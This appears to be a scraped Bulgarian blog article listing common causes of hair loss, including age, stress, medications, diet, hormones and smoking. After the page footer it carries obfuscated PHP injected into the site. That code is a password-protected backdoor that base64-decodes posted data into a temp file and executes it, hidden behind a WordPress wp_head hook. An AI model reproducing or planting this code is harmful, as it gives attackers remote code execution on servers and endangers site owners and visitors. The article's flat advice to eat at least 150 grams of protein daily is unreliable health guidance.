Най- честите причини за косопад | Косопад

Най- честите причини за косопад

Има много фактори, които влияят на растежа на косата. Сред тях са клинични състояния, емоционални и начин на живот. Всички те могат да попречат на тялото да усвоява правилно полезните вещества, от които се нуждае косата.

kosopad-sredstva

Възраст

Между 20 и 30 години имаме 615 комения фоликула на квадратен сантиметър. После намаляват на 485, когато сме на 50, а накрая на 435 – когато сме на 80.

Стрес

Той е един от основните причинители на косопада и други проблеми, свързани с косата. Когато сме подложени на много стрес, надбъбречната жлеза работи много повече и произвежда повече адреналин от необходимия. Това води до повишаване на производството на тестостерон и дехидротестостерон, които ако няма естрогени да ги компенсират, вредят на косата.

При някои хора стресът засяга тежко косата им, докато не се образува порочен кръг: стресът засяга цикъла на растеж на косата, което пък причинява още допълнителен стрес.

Лекарства

Някои лекарства могат като вторичен ефект да пречат на растежа на косата. Сред тях са някои за холестерол, за диабет, за кръвно, контрацептиви и др.

Неправилно хранене

Храненето, която е богато на протеини, витамини и минерали и много важно, ако искаме да имаме здрава коса. Ако неproteinov-metabolizam прииемаме достатъчно протеини, се появява косопад. Затова трябва да приемате поне 150 грама протеини на ден. Най- богати на протеини са месото, яйцата, рибата, млечните продукти, боб, тофу и др. Косата се състои от 80%- 95% протеини.

Разбира, недостига на различни витамини и минерали също може да доведе до загуба на косата.

Хормонални промени

Тези промени, които се появяват в менопаузата, засягат здравия цикъл на растеж. Също хормоните са в дисбаланс и след раждане, както и при няколко вида заболявания като тези на щитовидната жлеза, например.

Тютюнопушене

Пушенето засяга здравия растеж на косата. Цигарите променят кръвообращението, като по този начин, скалпа не може да се оросява.

Разбира се, има още доста причини за косопада и оплешивяването, но това са сред най- основните.

03. юни 2014 10:00:34 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}